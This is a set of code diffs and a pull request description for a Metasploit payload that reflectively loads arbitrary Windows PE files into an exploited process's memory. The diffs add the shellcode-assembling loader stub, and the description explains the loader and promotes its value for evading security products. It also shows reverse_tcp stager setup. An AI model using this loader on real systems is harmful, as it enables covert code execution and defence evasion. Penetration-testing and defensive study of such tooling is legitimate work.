+++ b/modules/payloads/stages/windows/peinject.rb
@@ -12,31 +12,44 @@ require 'msf/core/payload/windows/peinject'
 module MetasploitModule
   include Msf::Payload::Windows
   include Msf::Payload::Windows::PEInject
+  include Msf::Payload::Windows::ReflectivePELoader
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Windows Inject PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a relective PE loader stub.
-          Reflective PE payload will be started in a new thread inside the target process.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
+          will be started in a new thread inside the target process. This module requires a PE file which contains
+          relocation data.
         },
         'Author' =>
-            [
-              'ege <egebalci[at]pm.me>'
-            ],
+          [
+            'ege <egebalci[at]pm.me>'
+          ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X86,
         'References' =>
-            [
-              'https://github.com/EgeBalci/Amber'
-            ],
+          [
+            'https://github.com/EgeBalci/Amber'
+          ],
         'PayloadCompat' =>
-            {
-              'Convention' => 'sockedi handleedi -http -https'
-            }
+          {
+            'Convention' => 'sockedi handleedi -http -https'
+          }
       )
     )
+  end
+
+  def encapsulate_reflective_stub(mapped_pe)
+    call_size = mapped_pe.length + 5
+
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader += mapped_pe
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader).encode_string
+
+    reflective_loader
   end
 end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -13,31 +13,44 @@ require 'msf/core/payload/windows/peinject'
 module MetasploitModule
   include Msf::Payload::Windows
   include Msf::Payload::Windows::PEInject
+  include Msf::Payload::Windows::ReflectivePELoader_x64
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Windows Inject Reflective PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a relective PE loader.
-          Reflective PE payload will be started in a new thread inside the target process. This module requires a PE file witch contains relocation data.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
+          will be started in a new thread inside the target process. This module requires a PE file which contains
+          relocation data.
         },
         'Author' =>
-            [
-              'ege <egebalci[at]pm.me>'
-            ],
+          [
+            'ege <egebalci[at]pm.me>'
+          ],
         'References' =>
-            [
-              'https://github.com/EgeBalci/Amber'
-            ],
+          [
+            'https://github.com/EgeBalci/Amber'
+          ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X64,
         'PayloadCompat' =>
-            {
-              'Convention' => 'sockrdi handlerdi -http -https'
-            }
+          {
+            'Convention' => 'sockrdi handlerdi -http -https'
+          }
       )
     )
+  end
+
+  def encapsulate_reflective_stub(mapped_pe)
+    call_size = mapped_pe.length + 5
+
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader += mapped_pe
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64).encode_string
+
+    reflective_loader
   end
 end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -1,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/windows/peinject'
+
+###
+#
+# Injects an arbitrary PE file in the exploited process via reflective PE loader.
+#
+###
+module MetasploitModule
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::PEInject
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Inject Reflective PE Files',
+        'Description' => %q{
+          Inject a custom native PE file into the exploited process using a relective PE loader.
+          Reflective PE payload will be started in a new thread inside the target process. This module requires a PE file witch contains relocation data.
+        },
+        'Author' =>
+            [
+              'ege <egebalci[at]pm.me>'
+            ],
+        'References' =>
+            [
+              'https://github.com/EgeBalci/Amber'
+            ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X64,
+        'PayloadCompat' =>
+            {
+              'Convention' => 'sockrdi handlerdi -http -https'
+            }
+      )
+    )
+  end
+end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -22,9 +22,10 @@ module MetasploitModule
         info,
         'Name' => 'Windows Inject Reflective PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
-          will be started in a new thread inside the target process. This module requires a PE file which contains
-          relocation data.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE loader will
+          execute the pre-mapped PE image starting from the address of entry after perform image base relocation and API address resolution.
+          This module requires a PE file that contains relocation data and a valid(uncorrupted) import table. PE files with CLR(C#/.NET executables),
+          bounded imports, and TLS callbacks are not currently supported. Also, PE file witch uses resource loading might crash.
         },
         'Author' =>
           [
@@ -49,6 +50,6 @@ module MetasploitModule
     call_size = mapped_pe.length + 5
     reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
     reflective_loader += mapped_pe
-    reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64(opts)).encode_string
+    reflective_loader + Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64(opts)).encode_string
   end
 end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -52,7 +52,7 @@ module MetasploitModule
 
   def encapsulate_reflective_stub(mapped_pe, opts)
     call_size = mapped_pe.length + 5
-    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "sub rsp,0x40\ncld\ncall $+#{call_size}").encode_string # Allocate shadow stack
     reflective_loader += mapped_pe
     reflective_loader + Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64(opts)).encode_string
   end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -45,13 +45,10 @@ module MetasploitModule
     )
   end
 
-  def encapsulate_reflective_stub(mapped_pe)
+  def encapsulate_reflective_stub(mapped_pe, opts)
     call_size = mapped_pe.length + 5
-
     reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
     reflective_loader += mapped_pe
-    reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64).encode_string
-
-    reflective_loader
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64(opts)).encode_string
   end
 end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -52,7 +52,7 @@ module MetasploitModule
 
   def encapsulate_reflective_stub(mapped_pe, opts)
     call_size = mapped_pe.length + 5
-    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "sub rsp,0x40\ncld\ncall $+#{call_size}").encode_string # Allocate shadow stack
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "call $+#{call_size}").encode_string # Allocate shadow stack
     reflective_loader += mapped_pe
     reflective_loader + Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64(opts)).encode_string
   end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core/payload/windows/peinject'
+require 'msf/core/payload/windows/x64/reflective_pe_loader'
 
 ###
 #

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -41,6 +41,10 @@ module MetasploitModule
         'PayloadCompat' =>
           {
             'Convention' => 'sockrdi handlerdi -http -https'
+          },
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
           }
       )
     )


### PR DESCRIPTION
Salutations !

I have designed a new payload that allows to deploy any PE file reflectively in-memory. The main idea is similar to `windows/dllinject` payload but this payload is not limited to only reflective DLL files. It can deploy all sorts of PE file (EXE,DLL,SYS,COM...) reflectively without using the well known Reflective DLL Injection stub. The reflective loader used inside this payload belongs to one of my old [project](https://github.com/EgeBalci/amber). Loader will execute the PE file inside the target process (or generated payload binary) with starting a new thread. Executed PE file will not be registered to the `InMemoryOrderModuleList`. Simply PE will be executed as a one big shellcode. 

### How PE Loader Stub Works? (In a nutshell)

This PE loader takes advantage of the block_api or [similar API resolver](https://github.com/egebalci/crc32_api) blocks for calling Windows API functions. By design PE loader expects the address of the pre-mapped PE file on stack once executed. Previously mapping the PE file will give us advantage in terms of size of the reflective loader and less suspicious behavior. Once executing the reflective loader, it parses the pre-mapped PE image and performs image base relocation. After relocating the PE image into the newly allocated memory space with RWE permissions, It will start resolving the import address table(IAT). With the help of `LoadLibraryA` and `GetProcAddress` Windows API functions it will find all the imported function addresses and construct the IAT. After finishing the IAT resolving phase it will simply create a new thread starting from the PE file `AddressOfEntry` with calling `CreateThread`.

***Summary & Limitations***
1. It only uses `LoadLibraryA`, `GetProcAddress` and `CreateThread` to load a PE file.
2. It needs relocation data for moving PE image around in memory. (fully stripped PE files will not work for this module)
3. PE file must have a valid import table (corrupted or missing IAT will crash the loader)
4. Currently does not support CLR binaries (does not work on C# PE files)

All of this limitations can be solved but not with my current ruby skills. 

### Advantages

With this payload it is possible to deploy any PE file in-memory with multiple stages. Already existing payloads inside msf and meterpreter functionality is great but in some cases you need to be able to deploy third party PE files into a Windows environment for various reasons. (post exploitation, pivoting...) Also being able to deploy any PE file with such small stager shellcodes will make it much easier to evade all sorts of security products. PE Loader is pretty new compared to reflective DLL stub thus will be less detected. Also all of the already existing encoders can be applied to it for better evasion.

### Possible Improvements

If this PR gets merged following improvements can be made;
- More payload transfer conventions support such as `http,https`. (currently payload only supports `sockedi,sockrdi,handleedi,handlerdi`)
- CLR loading support to the reflective loader.
- Integration with @zeroSteiner 's [CrimsonForge](https://github.com/zeroSteiner/crimson-forge) project. (reflective loader code can be obfuscated in each generation) 
- Instead  of using the block_api there can be a alternative option with [IAT_API](https://github.com/egebalci/iat_api) witch uses the IAT entries while calling Windows API functions(normal behavior) instead of finding and calling the EAT functions of loaded modules(much better evasion but `GetProcAddress` must be imported in PE).

### Usage

**Payload Options**
```
msf5 payload(windows/reflective_pe/reverse_tcp) > set lhost 192.168.2.34 
lhost => 192.168.2.34
msf5 payload(windows/reflective_pe/reverse_tcp) > set lport 4444
lport => 4444
msf5 payload(windows/reflective_pe/reverse_tcp) > set pe /tmp/putty.exe
pe => /tmp/putty.exe
msf5 payload(windows/reflective_pe/reverse_tcp) > 
```

***Stager EXE Payload Demo***

![payload_demo](https://user-images.githubusercontent.com/17179401/89872951-5dad5380-dbc2-11ea-8616-e981b089bee2.gif)

***Payload Inject Module Demo*** 

![payload_inject_demo-min](https://user-images.githubusercontent.com/17179401/89873787-a44f7d80-dbc3-11ea-85aa-576c23c43dcd.gif)
